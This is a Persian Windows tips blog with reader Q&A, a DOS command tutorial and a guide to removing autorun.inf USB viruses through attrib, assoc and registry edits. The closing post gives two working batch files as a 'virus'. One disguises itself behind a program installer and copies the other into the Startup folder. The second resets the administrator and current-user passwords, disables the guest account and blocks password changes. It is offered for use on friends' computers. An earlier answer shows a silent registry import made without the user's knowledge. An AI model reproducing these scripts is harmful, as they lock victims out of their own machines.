آموزشی

خوش آمدید

لطفا موضوع مورد نظر را انتخاب کنید

 

========================================

 

 

 

 

=======================================

 

ترفندهای ویندوز

رجیستری

داس

اینترنت

دانلود برنامه

سخت افزار

دانستنی ها

داستان کوتاه

روانشناسی و سخنان بزرگان

مطالب طنز جک اس ام اس و ...

خطای چشم

فیلتر شکن (سایت فیلتر شکن فیلتر نشده)

با عرض سلام و خسته نباشید
سوالی داشتم که اگر ممکنه راهنماییم کنید
ریجستری کامپیوتر من غیر فعال شده و وقتی کلمه regedit را در run تایپ می کنم ریجستری باز نمی شود به پست های قبی وبلاگ شما مراجعه کردم و دستور تایپ عبارت c:\autorun.inf را در run انجام دادم ولی فایلی باز نشد همچنین آنتی ویروس کامپیوتر اجرا نمی شود . می خواستم بدونم آیا راه حلی هست که بدون عوض کردن ویندوز بتونم این مشکل را برطرف کنم؟
منتظر جوابتون هستم
با تشکر

==========================================================

با سلام با توجه به این که ضد ویروس و رجیستری سیستم اجرا نمی شوند در نتیجه سیستم شما ویروسی شده است.

درباره ضد ویروس باید بگم شما اون رو Uninstall کنید و بعد از راه اندازی مجدد اون رو نصب کنید.

با این کار ممکن است مشکل ضد ویروس برطرف شود.

درباره رجیستری هم با وارد کردن دستور زیر در محیط داس رجیستری باز میشود که اگر ویروس روی کامپیوتر باشد ممکن است بعد از چند لحظه رجیستری دوباره قفل شود.

reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 0 /f

 برای وارد کردن این دستور در کادر Run دستور CMD را وارد کنید تا داس ویندوز باز شود و در محیط داس دستور بالا را Paste کنید.

همچنین می توانید دستور بالا را به طور مستقیم در کادر Run وارد کنید.

در صورتی که سیستم بازگردانی ویندوز غیرفعال نشده باشد شما می توانید با استفاده از این برنامه ویندوز خود را به زمانی که این مشکل پیش نیامده بود بازگردانی کنید.

شما می توانید برنامه System Restore را از مسیر زیر اجرا کنید.

 Start Menu\All Programs\Accessories\System Tools\System Restore

برای اطلاعات بیشتر به دو لینک زیر مراجعه کنید.

فعال و غیر فعال کردن رجیستری و System Restore با استفاده از رجیستری - پنجشنبه سوم بهمن 1387

بازگردانی فایل های سیستمی و فعال کردن رجیستری - شنبه بیست و سوم شهریور 1387

 

در صورتی که مشکلی داشتید در بخش نظرات بیان کنید.

سلام

من از روشی که برای حذف autorun.inf گذاشته بودین استفاده کردم. اما وسط راه وقتی(assoc .hassan=exefile

assoc .exe=htmlfile)
اینارو اجرا کردم تمام فایل های exe من تبدیل به html
شدن لطفا منو راهنمایی کنین.

=============================================================

اگر شما پسوند فایل ها را می بینید. فایل CMD.exe را از مسیر C:/WINDOWS/SYSTEM32 در یکی از درایو ها کپی کنید و این فایل را به CMD.HASSAN تغییر نام دهید. حالا با کلیک کردن روی این فایل داس باز می شود و می توانید بقیه مطلب را ادامه دهید.

همچنین با دستور ASSOC .EXE=EXEFILE می توانید وضعیت را به حال اول برگردانید.

در صورتی که پسوند فایل ها را نمی بینید ار روش قبل نمی توانید استفاده کنید.

در این صورت برای رفع مشکل باید فایل CMD.EXE به جای فایل TASKMGR.EXE کپی کرد و با فشردن سه کلید ALT+CTRL+DELETE به جای TASKMGR.EXE داس را اجرا کنیم.  

برای این کار فایل CMD.EXE  را که به یکی از درایو ها کپی کرده اید. به TASKMGR.EXE تغییر نام دهید. البته باید توجه داشته باشید که پسوند فایل نمایش داده نمی شود و شما فایل CMD را به TASKMGR  تغییر نام می دهید. سپس فایل TASKMGR.EXE در پوشه SYSTEM32 را در یکی از درایو ها کپی کنید. تا بعد از این عملیات این فایل را به جای خود باز گردانید. حال فایل داسی را که به TASKMGR تغییر نام داده اید در پوشه SYSTEM32 کپی کنید در این موقع گزینه yes را بزنید تا این فایل روی فایل قبلی کپی شود بلافاصله بعد از کپی یه کلید  ALT+CTRL+DELETE را فشار دهید تا داس باز شود حالا با دستور ASSOC .EXE=EXEFILE وضعیت را به حالت عادی برگردانید.

بعد از این کار فایل TASKMGR.EXE اصلی را در پوشه SYSTEM32 کپی کنید.

با سلام و خسته نباشید
دو تا سوال داشتم ممنون میشم اگر جوابم رو بدید.
1. چگونه میشه با استفاده از فرمانهای داس تغییراتی در رجیستری انجام داد.
2. همین طور در GPedit.msc یا همون Group Policy
((بدون اینکه از من پرسشی انجام بشه))

جواب سوال آقا امین

اول باید بگم که Group Policy هم رجیستری را ویرایش می کنید. یعنی وقتی شما به وسیله Group Policy تنظیمات را اعمال می کنید این تنظیمات توسط Group Policy در رجیستری انجام می شوند.

برای ویرایش رجیستری به وسیله داس از فایل reg.exe استفاده می کنیم.

reg add :اضافه کردن مقادیر

reg delete :پاک کردن مقادیر

و...

که شما می توانید شرح این دستورات را با تایپ کردن دستورات زیر در cmd ببینید.

reg /?

reg add /?

reg delete /?

 

 در این روش برای اضافه کردن هر مقدار یک دستور باید بنویسیم که این کار هم وقت گیر است و هم با اشتباهات زیادی روبه رو می شود.

در روش دوم به روشی ساده می توان تمام مواردی را که می خواهیم در رجیستری اعمال کنیم.

روش دوم:

 تغییرات را در رجیستری اعمال کرده و از آن یک فایل پشتیبان می گیریم.

میدانیم که این فایل روی هر کامپیوتری اجرا شود تنظیمات در رجیستری آن کامپیوتر اعمال می شود.

حالا برای اجرا کردن فایل پشتیبان بدون این که پرسش و درخواست اجازه مطرح شود از دستور

regedit /s filename.reg

استفاده میکنیم.

می توانیم این دستور را در یک فایل دسته ای قرار دهیم. و این فایل را به همرا فایل پشتیبان در یک پوشه کپی کنیم. حالا با اجرای فایل دسته ای بدون این که کاربر متوجه بشود تمام تنظیمات فایل پشتیبان در رجیستری قرار می گیرد.

در صورتی که سوالی در این مورد دارید در قسمت نظرات بیان کنید.

تصمیم گرفتم آموزش کامل داس رو بذارم. از این پست که آموزش دستورات مقدماتی و مبنا هست شروع میکنم. و در صورتی ادامه میدم که بازدید کننده گان نظر بدن و تا آخراموزش با من همراه باشن که در این صورت من هم قول آکوزش داس رو به طور کامل بذارم.

برای من واقعا عجیب هست روزانه دست کم ۳۰ نفر از سایت گوگل وارد وبلاگ من میشن که از این تعداد نصفشون سوال پرسیدن که میدونم به جوابشون هم نرسیدن خب من همه جای این وبلاگ نوشتم که هر کس سوالی داره بپرسه تا من جواب بدم که اکثر سوال ها هم درباره داس هست. ولی هیچ کس سوال نمی پرسه

خب برای شروع با دستورات اصلی داس شروع می کنیم.

ردیف	دستور	عملکرد دستور
1	CD	تغییر مسیر خط اعلان (رفتن خط اعلان به پوشه ها)
2	DIR	نمایش لیست فایلها و پوشه ها
3	REN	تغییر نام فایل ها و پوشه ها
4	COPY	کپی فایل ها
5	DEL	پاک کردن فایل ها
6	MD	ساختن پوشه
7	CLS	پاک کردن صفحه نمایش داس
8	RD	پاک کردن پوشه
9	TYPE	نمایش محتویات فایل های متنی

۱: دستور cd برای انتقال خط اعلان داس میباشد.(باز کردن پوشه) برای مثال خط اعلان جاریC:\Documents and Settings\hassan\Desktop> می باشد. و ما می خواهیم  به پوشه e:\hassan\bank برویم. اول در مقابل خط فرمان تایپ میکنیم. \:e و اینتر را میزنیم و بعد دستور

cd hassan\bank را وارد می کنیم. اگر بخواهیم یک پوشه به عقب برگردیم از دستور ..cd استفاده میکنیم.

تذکر خیلی مهم :کلا در تمام دستورهای داس وقتی که می خواهیم آدرسی را وارد کنیم در صورتی که در ادرس فایل  فاصله باشد. باید تمام آدرس را در علامت "" قرار دهیم.در غیر این صورت داس ادرس را تشخیص نمی دهد. طبق مثال زیر

cd "C:\Documents and Settings\hassan\Start Menu\Programs\Startup"

که در قسمت Documents and Settings فاصله وجود دارد. بهتر است که همیشه آدرس ها را در این علامت بگذاریم.

۲:از دستور dir برای دیدن محتویات درایو ها وپوشه ها استفاده می شود. مثلا برای دیدن محتویات درایو \:e این دستور را وارد می کنیم. \:dir e و برای دیدن محتویات پوشه hassan در درایو \:e  این دستور را وارد می کنیم.dir e:\hassan

پارامترهای مهم دستور dir

 

ردیف	پارامتر	عملکرد
1	/P	نمایش اطلاعات به صورت صفحه به صفحه
2	/A	نمایش فایل هایی که خصلت های ویندوز را داشته باشند یا نداشته باشند
3	/S	نمایش محتویات پوشه جاری همراه با تمام پوشه های درون پوشه جاری

 

برای استفاده از پارامترها باید به روش زیر عمل کنید

DIR /S

۲:دستور dir به صورت عادی فایل ها و پوشه های مخفی را نمایش نمی دهد. اگر پارامتر a به تنهایی استفاده شود فایل های مخفی نمایش داده میشوند.به مثال های زیر توجه کنید

1: DIR E:\HASSAN /A:SH-R

2: DIR E:\ SE*.EXE /S

دستور اول تمام فایل ها و پوشه هایی که فقط در درایو e و نه درون پوشه های درایو e هستند و خصلت سیستمی- مخفی را دارند و خصلت فقط نوشتنی را ندارند. نمایش میدهد.

دستور دوم تمام فایل هایی که در درایو e و در تمام پوشه های این درایو هستند که با se شروع میشوند و پسوند exe. دارند را نمایش می دهد.

۳: دستور ren برای تغییر نام فایل ها و پوشه ها استفاده می شود. به دستور های زیر توجه کنید.

1: REN E:\1.JPG E:\15.JPG

2: REN E:\HASSAN E:\FOLDER

3: REN E:\*.EXE 1.EXE

دستور اول در درایو e فایل 1.jpg را به 15.jpg تغییر نام می دهد.

دستور دوم پوشه hassan را به folder تغییر نام می دهد.

دستور سوم در درایو e تمام فایل های با پوند exe. را به 1.exe تغییر نام می دهد. که در پرانتز برای هر فایل یک شماره انتخاب می کند.

۴: به دستورات زیر توجه کنید

1: copy e:\15.jpg f:\1.jpg

2: copy e:\*.exe f:\*.exe

دستور اول فایل 15.jpg را از درایو e به درایو f و با نام 1.jpg کپی میکند.

دستور دوم تمام فایلهای با پسوند exe را از درایو e به درایو f کپی میکند.

۵: دستور del بدون پارامتر نمی تواند فایل های مخفی سیستمی و همچنین فقط نوشتنی را پاک کند.

ردیف	پارامتر	عملکرد
1	/F	برای پاک کردن فایلهای دارای خصلت فقط نوشتنی
2	/S	پاک کردن فایل دز زیر پوشههای پوشه جاری
3	/Q	عدم اجازه گرفتن برای پاک کردن فایل ها
4	/A	تعییین کردن خصلت فایل ها

 به دستور های زیر توجه کنید.

1: DEL E:\1.JPG /A
2: DEL  E:\15.JPG /A:R
3: DEL E:\*.EXE /S

دستور اول فایل 1.jpg را از درایو e پاک میکند که اگر این فایل مخفی یا سیستمی هم باشد پاک میشود ولی اگر فقط نوشتنی باشد پاک نمی شود.

دستور دوم فایل فایل 15.jpg را پاک می کند که این فایل اگر دارای خصلت های مخفی سیستمی و فقط نوشتنی هم باشد پاک می شود.

دستور سوم تمام فایل های باپسوند exe را از درایو e و تمام پوشه های درون درایو پاک می کند.

۶:به دستورات زیر توجه کنید.

1: md e:\hassan\ali

2: md "e:\ali    m"

دستور اول در مسیر e:\hassan یک پوشه جدید به نام ali می سازد.

دستور دوم در درایو e یک پوشه به نام "ali   m" می سازد.

۸: در صورتی که از دستور rd بدون پارامتر استفاده شود فقط پوشه های خالی حذف میشوند.

ردیف	پارامتر	عملکرد
1	/s	پاک کردن زیر پوشه های پوشه جاری
2	/q	عدم اجازه گرفتن از کاربر برای پاک کردن زیر پوشه ها

به دستور های زیر توجه کنید.

1: RD E:\HASSAN

2: RD E:\HASSAN \S

دستور اول پوشه hassan را در صورتی که خالی باشد پاک می کند

دستور دوم پوشه hassan و تمام پوشه های درون پوشه hassan را می کند. وفایلهای پوشه ها هم پاک می شوند. همچنین برای پاک کردن از شما اجازه می گیرد.

۹:دستور type محتویات فایل متنی را در خط اعلان نمایش می دهد.

1: TYPE E:\15.TXT

 این دستور محتویات فایل ۱۵.txt را نمایش می دهد.

هر سوالی در مورد ویندوز رجیستری و داس دارید در این وبلاگ مطرح کنید.

با سلام

امروز میخام نحوه پاک کردن کردن ویروسهایی که از فایل autorun.inf استفاده می کنند رو بنوسیم.

اول از همه بگم این روش رو تا حالا توی هیچ سایتی ندیدم تا حالا هم توی هر وبلاگی که اموزش پاک کردن این ویروس ها گذاشته شده هیچ کدوم به درد نمیخوره و همشون الکی هستند.

توی این اموزش ما از داس و رجیستری برای پاک کردن ویروس استفاده می کنیم.

از نشونه های این ویروس ها هم اجرا نشدن cmd.exe regedit.exe msconfig.exe gpedit.msc 

غیر فعال شدن show hidden files and folders  هست.

دستوراتی که براي پاك كردن ويروس  استفاده می کنیم.

دستور	كاربرد
dir	نمایش فایل ها و پوشه های ویندوز
cd	تغییر مسیر دادن خط دستور داس
attrib	نمایش و تعیین خصلت فایل ها {مخفی-سیستمی و ...}
assoc	نمایش و تعيین نوع  فرمت فایل ها
ren	تغییر نام فایلها و پوشه ها

البته این ویروسها نشونه های دیگری هم دارند ولی چون من خیلی وقت پیش این ویروس رو پاک کردم.  حالا خیلی دقیق نشونه های اون رو بلد نیستم .

اگه بعد از خوندن این اموزش کسی مشکلی داشت ویروسش رو برام بفرسته به ایمیل hassan_b315@yahoo.com البته نه هر ویروسی ویروس هایی که از فایل autorun.inf استفاده می کنند. مثل kazme_gayze  یا svchost.exe یا explorer.exe ویروس new folder.exe هم بفرستید مشکلی نیست.تا من جوابش رو بدم.

نحوه فرستادن ويروس : ويروس رو فشرده كنيد روش پسورد بزاريد بعد بفرستيد.

در ضمن اين پست هم مخصوص آقا پيمان گل هست. پيمان هر وقت اومدي روي تبليغ گرافيكي زير عنوان وبلاگ يه كليك كن تا 60 تومن از تو به ما رسيده باشه.

خب این ویروس ها از کجا میان و چه جوری اجرا میشن. این ویروس ها بیشتر از فلاش وارد کامپیوتر میشن و از طریق فایل  autorun.inf  اجرا میشن. یعنی وقتی ما روی درایوی که ویروس  توش هست کلیک میکنیم تا باز بشه ویروس اجرا میشه و این ویروسه که درایو مورد نظر رو باز می کنه تا رد  گم  کرده باشه.وقتی هم که اجرا شد خودش رو توی تمام درایو ها کپی میکنه همراه با فایل autorun.inf  بعد از این دیگه هر وقت وارد یکی از درایوها می شیم ویروس رو هم اجرا می کنیم. البته این ویروس بعد از اینکه بار اول اجرا شد دیگه تا زمانی که نابود نشه همیشه در حال اجرا هست.

من یه جا خوندم که نوشته بود برای اینکه این ویروسها اجرا نشن روی درایو راست کلیک کرده و open رو بزنید. من نمیدونم روی چه حسابی این رو نوشته بود. وقتی که روی یه درایو راست کلیک کنیم گزینه open پر رنگ هست. یعنی اگر دابل کلیک کنیم انگار این هست که راست کلیک کرده باشیم و گزینه open  رو زده باشیم . حتی اگر  explorer رو هم بزنیم باز ویروس اجرا میشه این رو خودتون بعد از دیدن فایل autorun.inf  متوجه می شید.

راه اینکه هنگام باز کردن درایو ویروس اجرا نشه اینه که My Computer رو باز کنید و در نوار ادرس درایو مورد نظرتون رو تایپ کنید. مثلا اگر میخاهید درایو E  رو باز کنید تایپ می کنید \:e و اینتر رو میزنید.

از این روش برای باز کردن درایو فلاش استفاده کنید. تا کامپیوترتون ویروسی نشه.

برای اینکه بفهمید کامپیوترتون به این نوع ویروسها الوده شده یا نه یکی از درایو ها رو باز کنید.

و در نوار ادرس بعد از اسم درایو autorun.inf  رو تایپ کنید و اینتر بزنید مثلا e:\autorun.inf  اگر فایل باز شد کامپیوتر ویروسی هست.توی این فایل ببینید در مقابل commend اسم یه فایل نوشته شده که اون ویروس هست.

و اما برسیم به نحوه پاک کردن ویروس

برای پاک کردن ویروس ما باید کاری کنیم که اجرا نشه بعد میشه اون رو پاک کرد.

کار ما با داس انجام میشه و داس هم توسط ویروس غیر فعال شده پس ما باید داس رو فعال کنیم.

برای فعال کردن داس در درایو ویندوز وارد مسیرwindows\system32  می شید.فایل cmd.exe رو پیدا می کنید. و اون رو توی درایوe کپی کنید.بعد اسم اون رو تغییر بدید. مثلا hassan.exe البته پسوند فایل نشون داده  نمیشه و ویروس هم کاری  کرده  که نمایش پسوند  فایلها از توی فولدر اپشن فعال نشه . 

حالا اگر روی فایل hassan.exe  کلیک کنید داس اجرا میشه.

حالا تایپ کنید :e تا داس وارد یکی از درایو ها بشه. حالا دستور attrib رو وارد کنید. با وارد کردن این دستور لیست فایل هایی که توی درایو هستند نشون داده میشه سمت چپ اسم فایل ها  ممکنه تعدادی یا همه این حرف ها باشه a-s-h-r    که جدول زیر نشون میده منظر از این حرف ها چی هست.

حرف	خصلت
a	ارشيو
s	سيستمي
h	مخفي
r	فقط نوشتني

حالا فایل ویروس و فایل autorun.inf هم مخفی هستند هم سیتمی هم فقط نوشتنی و ارشیو هم هستند.

با دستور attrib -a -s -r -h filename می تونید.این خصلت ها رو از فایل ویروس بردارید در این موقه ویروس به صورت معمولی نشون داده میشه و بعد از چند لحظه به حالت قبلی بر می گرده اگر این فایل رو پاک کنیم دوباره کپی میشه.

ما دستور attrib -a -s -h -r رو وارد می کنیم.{بدون اسم فایل} با این دستور تمام فایلها نشون داده می شن حالا روی فایل ویروس راست کلیک میکنیم و حجمش رو نگاه می کنیم .

تا این جا فقط دست گرمی بوده از این جا به بعد کارمون شروهع میشه.

 

ما یه دستور وارد میکنیم تا هیچ فایلی با پسوند exe. اجرا نشه در عوض توي internet explorer نشون داده بشه. ويروس هم كه فايل exe. هست پس اجرا نميشه بعد كامپيوتر رو log off ميكنيم بعد از وارد شدن دوباره به ويندوز هيچ فايل اجرايي با پسوند exe. اجرا نميشه ولي توي مرورگر اينترنت باز مي شن . در قسمت نوار آدرس  آدرس فايلي كه هنگام راه اندازي ويندوز خود به خود اجرا ميشه داده شده بين اين برنامه ها بايد فايل ويروس رو پيدا كنيد.و اون رو پاک کنید.{حالا دیگه ویروس فعال نیست و میشه اون رو پاک کرد.} ولی یک نکته هست که باید بدونید اونم اینه که اگه كاري كنيم كه فایل exe. اجرا نشه و بعد log off كنيم. بعد از راه اندازي مجدد ديگه نميتونيم داس يا همون hassan.exe رو اجرا كنيم. براي  حل اين مشكل بايد يه فرمت اجرايي جديد براي كامپيوتر تعريف كنيم. مثلا hassan.  و فايل hassan.exe رو به hassan.hassan تغيير اسم بديم. حالا ديگه با كليك كردن روي اين فايل داس اجرا مي شه.

خب حالا دستورات داس.

اول یه کپی از hassan.exe در يه درايو ديگه مثلا :f كپي مي كنيم. و از طريق داس اون رو به hassan.hassan تغيير نام ميديم.

ren f:\hassan.exe hassan.hassan

بعد اين دستورات رو وارد مي كنيم 

assoc .hassan=exefile

assoc .exe=htmlfile

خط اول يه فورمت اجراي جديد ‌‌‌‌‌‍‌‍{hassan.}  تعريف مي كنيم.

خط دوم باعث ميشه كه فايل هاي اجرايي با پسوند exe. از اين به بعد با مرورگر اينترنت باز بشند.

حالا كامپيوتر رو log off مي كنيم.

بعد از راه اندازي مجدد ديگه برنامه ها اجرا نميشن.

حالا فايل hassan.hassan رو از درايو :f اجرا مي كنيم.

پوشه جاري داس درايو :f  هست. با دستور attrib -a -s -h -r  ويروس و فايل autorun.inf ظاهر ميشند. خب ما اين دوتا فايل رو پاك ميكنيم.‌{حتمي نگاه كنيد ببينيد اندازه فايل ويروس اصلي چه قدر هست چون بعد لازم ميشه}  با تمام درايوها اين كار رو بكنيد. براي رفتن به درايو ديگه مثلا درايو :d تايپ كنيد :d و اينتر رو بزنيد.

تذكر: در درايو :c چند تا فايل مخفي هست كه مربوط به پيكر بندي سيستم عامل هست به هيچ وجه اونا رو پاك نكنيد.

وقتي كه ويروس درايو ها رو پاك كرديد. كامپيوتر رو log off كنيد. بعد از وارد شدن دوباره  از داس و دستور attrib نگاه كنيد ببينيد. ويروس هست يا نه. نبايد باشه ولي اگر كه ويروس كپي شده بود نشون مي ده كه ويروس غير فعال نشده كه اين بار بايد كامپيوتر رو restart بكنيد و دوباره ويروس رو از درايوها پاك كنيد.

حالا سعي كنيد ويروس رو از بين فايل هايي كه موقع راه اندازي توسط مرورگر اينترنت باز شدن پيدا كنيد و اون رو پاك كنيد. به احتمال زياد ويروس در پوشه windows يا system32 هست.

در كادر runتايپ كنيد msconfig و اينتر كنيد. فايل  توسط مرورگر اينترنت باز ميشه اون آدرس اون رو پيدا كنيد و اون رو در درايو :f كپي كنيد و فورمت اون رو به hassan. تغيير بديد و اون رو اجرا كنيو در كادر باز شده وار تب start up بشين از بين فايل هايي كه اين جا هستن فايل ويروس رو پيدا كنيد. اون رو از حالت انتخاب خارج كنيد و ok كنيد. جلو خط اعلان داس تايپ كنيد :c بعد هم تايپ كنيد cd windows  سپس دستور attrib  رو وارد كنيد. فايل هايي كه حروف  A     SHR رو دارند و پسوند اون ها EXE.  هست رو پيدا كنيد. اگر حجم اون ها با حجم ويروس مورد نظر يكي هست اون رو پاك كنيد. بعد از پوشه windows  وارد پوشه system32 بشيد و همين كار رو بكنيد.

در رجيستري مكان هايي هست كه ميشه يه فايل رو بزاريم براي اجراي خودكار هنگام راه اندازي كه توسط msconfig.exe  نشون داده  نميشن. يكي از اون كليده ها كه اين ويروس ها از اون استفاده مي كنند. مسير

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

 هست. در اين كليد مقدار متغيير Shell   بايد  explore.exer باشد. در صورتي كه بعد از اين مقدار چيز ديگري اومده باشه اون اسم ويروس هست كه در پوشه windows يا system32 هست. اون رو پيدا كنيد و پاك كنيد. و مقدار متغيير Shell رو به explorer.exe تغيير بديد.

توجه: در صورتي كه متغيير Shell رو پاك كنيد يا مقدار اون رو تغيير بديد ديگه نميتونيد وارد ويندوز بشيد.

حالا ديگه با اين كار ها ويروس پاك شده

از اين به بعد وقتي فلاش به كامپيوتر وصل مي كنيد. در نوار آدرس; آدرس درايو مورد نظر رو بنوسيد و اينتر بزنيد. ولي قبل از اين كار توسط داس يه نگاه بندازيد ببينيد توي فلاش ويروس هست يا نه اگر بود اون رو همراه با فايل autorun.inf رو پاك كنيد و log off كنيد. بعد از اين ديگه  مي تونيد با كليك  وارد درايو فلاش بشيد.

 

در باره ويروس new folder.exe هم بعد بايد اين مراحل رو انجام بديد البته فايل autorun.inf نداره بعد از غير فعال كردن ويروس در كامپيوتر كادر جستجو رو باز كنيد و در قسمت جستجو تايپ كنيد exe.* و اينتر رو بزنيد . تمام فايل هاي exe. نشون داده مي شن فايل هايي كه ايكون اون ها به شكل پوشه هست و حجم اون ها هم اندازه ويروس هست پاك كنيد. 

براي فعال كردن قسمت هاي cmd.exe -regedit.exe-msconfig-gpedit.msc و بقيه موارد به پست قبلي در همين وبلاگ مراجعه كنيد.

فعال کردن قسمت های غیر فعال شده  فولدر اپشن {folder option}:

براي فعال كردن  show hidden all files and folders وارد رجيستري بشيد. به كليد زير بريد. 

توجه تمام این متغییرها باید از نوع dword باشند.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced

\Folder\Hidden\NOHIDDEN

 و طبق جدول زیر متغیره ها رو اصلاح کنید.

اسم متغير	نوع متغير	مقدار متغير
CheckedValue	dword value	2
DefaultValue	dword value	2

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced

\Folder\Hidden\SHOWALL

اسم متغير	نوع متغير	مقدار متغير
CheckedValue	dword value	1
DefaultValue	dword value	2

فعال کردن قسمت Hide ectensions for known file types

اين قسمت مربوط به نمايش فرمت فال ها مي باشد كه توسط ويروس غير فعال مي شود.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced

\Folder\HideFileExt

اسم متغير	نوع متغير	مقدار متغير
CheckedValue	dword value	1
DefaultValue	dword value	1

فعال كردن قسمت Hide protected operating system files

اين قسمت مربوط به نمايش فايل هاي سيستمي ميباشد كه توسط ويروس غير فعال مي شود. 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced

\Folder\SuperHidden

اسم متغير	نوع متغير	مقدار متغير
CheckedValue	dword value	0
DefaultValue	dword value	0

البته با اين روش ميشه وسروسهاي ديگه رو هم پاك كرد.

در اخر هم با دستور زیر ویندوز رو به حالت معمولی خود برگردونید.

assoc .exe=exefile

در صورتي كه كسي سوالي در اين مورد داشت ميتونه در قسمت نظرات بيان كنه.

ویرایش در تاریخ ۲۰/۹/۱۳۸۷

پریسا خانم یه مشکل در رابطه با این مطلب داشتند. که باید بگم چون فونت نوشته های این مطلب بزرگ  و آدرس کلید مربوطه طولانی بود یک قسمت از آدرس نشون داده نمی شد

به همین خاطر شما مقدار مورد نظر را نمی دید چون به کلید مورد نظر نرفته بودید. ولی فونت مطلب را درست کرده ام حالا دیگه به دو کلید مورد نظر برید و طبق جدول مقادیر را ویرایش کنید و اگر این مقادیر وجود نداشتند این مقادیر را بسازید.

در صورتی که بعد از ویرایش این مقادیر مشکل حل نشد ویروس پاک نشده که اگر این جوری باشه ویروس دوباره این مقادیر را تغییر میده و گزینه را غیر فعال میکنه.

با این توضیحات فکر می کنم دیگه مشکل حل بشه

جواب سوال دوم شما در صفحه اصلی وبلاگ می باشد.

باسلام امروز ميخام ساخت ويروسي رو اموزش بدم كه با اجرا كردن اون پسورد يوزرهاي كامپيوتر تغيير كنه

يا ساخت اين ويروس پسورد كامپيوتري كه فايل روش اجرا ميشه رو هر چيزي كه دلمون بخاد ميزاريم.

ما بايد ويروس رو توي پوشه استارت اپ ويندوز كپي كنيم تا با ورود كاربر به كامپيوتر پسوردش رو عوض كنه.

باید ویروس رو به یه فایل بچسبونیم. که تابلو نباشه. طرف فکر میکنه داره مثلا برنامه یاهو مسنجر نصب میکنه یا هر چیز دیگری خب برنامه اصلی اجرا میشه و ویروس هم کپی میشه.

اين ويروس از دوتا فايل تشكيل شده يكي فايل ويروس اصلي و ديگري فايلي كه ويروس اصلي رو توي استارت اپ كامپيوتر طرف كپي ميكنه و برنامه رو اجرا میکنه.

اسم فايلي كه ويروس رو كپي ميكنه ميزاريم 1.bat و اسم فایل ویروس اصلی رو میزاریم 2.bat

متن فایل 1.bat که باید در نوت پد نوشته بشه و با اسم 1.bat دخیره بشه.

@echo off > c:/a

start "filename" c:/a

copy 2.bat "%homedrive%\Documents and Settings\All Users\Start Menu\Programs\Startup" >c:/a

del 2.bat >c:/a

توضیح فایل 1.bat

خط اول دستور echo off@ باعث میشه که هنگام اجرا شدن فایل دسته ای دستورات دیده نشن. و قسمتی که با رنگ قرمز نشون داده شده باعث میشه نتیجه دستور درون فایل a در درایو :c ذخیره بشن و در فایل اصلی دیده نشن.

خط دوم فایلی هست که باید اجرا بشه تا کاربر متوجه ویروس نشه مثلا فایل setup یه بازی یا هر چیز دیگه ای.

خط سوم فایل ویروس رو توی استارت اپ کامپیوتر کپی میکنه

خط چهارم فایل ویروس رو پاک میکنه که رد پا نمونه . البته این مرحله اختیاری هست.

 

 

متن فایل ویروس اصلی هم در زیر نوشته شده که باید با اسم 2.bat ذخیره بشه.

 

@echo off
net accounts /minpwage:00 >c:/a
net user administrator hassan >c:/a
net user %username% hassan >c:/a
net user guest /active:no >c:/a
net accounts /minpwage:30 >c:/a

توضیح فایل ویروس اصلی

خط دوم تعیین میکنه که کاربر بعد از چند روز بتونه پسوردش رو تغییر بده که در این جا مدت صفر رو گذاشتیم.

خط سوم پسورد حساب کاربر سرپرست رو به hassan تغییر میده.

خط چهارم پسورد کاربری که در حال حاضر وارد شده رو تغیر میده

خط پنجم حیاب کاربری مهمان رو غیر فعال میکنه.

خط ششم میگه که تا سی روز دیگه کاربر نمیتونه پسوردش رو تغیر بده یا حذف کنه.

 

 

بعد از اینکه ویروس روی کامپیوتری اجرا بشه با راه اندازی مجدد کامپیوتر پسورد حساب کاربر سرپرست و کاربر جاری رو تغییر می ده که در اون لحظه کاربر این رو تشخیص نمیده .

بار دیگه که کامپیوتر راه انداری میشه پسورد دو تا از کاربر ها تغییر کرده خب حالا اگر حساب کاربری دیگه ای باشه کاربر با اون وارد کامپیوتر میشه ولی هیچ کاری با دو تا حساب کاربری قبلی نمیتونه انجام بده و پسورد حساب کاربری جاری هم تغییر کرده و نمیتونه با اون هم کاری بکنه. پس ممکن یه حساب کاربری دیگه بسازه و حساب کاربری مهمان [guest] رو فعال کنه ولی با راه اندازی مججد کامپیوتر پسورد این حساب هم تغییر میکنه و کاربر مهمان هم غیر فعال میشه.

اگر کاربر چیزی بارش نباشه که همون اول تمام پسورد تمام حساب ها تغییر میکنه.

اگه هم وارد باشه که خیلی راحت فایل ویروس رو پیدا میکنه و اون رو پاک میکنه. البته پسورد رو هم از توی فایل میبینه.

بیشتر کامپیوتر ها فقط یک حساب کاربری دارند. و به همین دلیل خیلی راحت با یک بار راه اندازی بعد از اجرا شدن برنامه دیگه نمی تونن وارد کامپیوتر بشن.

میشه کاری کنیم که ویروس از توی رجیستری اجرا بشه این جوری فقط کاربرهای حرفه ای میتونن ویروس رو پیدا کنن.

اگه کسی خواست بگه تا نحوه گذاشتن ویروس رو توی رجیستری بگم. 

اگر این ویروس رو به دوستتون داده باشین میتونید بعد از اینکه تمام اشتراک ها غیر غعال شدن پسورد رو بهش بگین اونم که نمیتونه پسورد رو تغییر بده.

 

در ضمن برنامه هایی هستن که میتونن فایلها رو با هم قاطی کنن. میتونید با اون برنامه فایل bat. رو به فایل exe. تغییر بدید. اینجوری اگر کسی ویروس رو هم اجرا کنه نمیتونه اطلاعاتی از اون بگیره. ولی اشکال این هست که بیشتر این فایل ها برنامه ها توسط ضد ویروس به عنوان ویروس شناخته میشن.

درخواست هر نوع ویروسی که دارید این جا مطرح کنید

 

ساخت یه ویروس خیلی با حال به وسیله داس.

در این پست میخام اموزش داس بذارم اگه کسی از این پست خوشش اومد. نظر بذاره تا من هم با این اموزش ادامه بدم.تا این جا که ما هرچی نوشتیم از نظر خبری نبود.

این اموزش زو بخونید حال کنید.

البته این در اصل ویروس نیست ولی برای ۹۰ درصد ویروس به حساب میاد و اگه روی کامپیوترشون اجرا بشه هیچ کاری نمتونن بکنند.

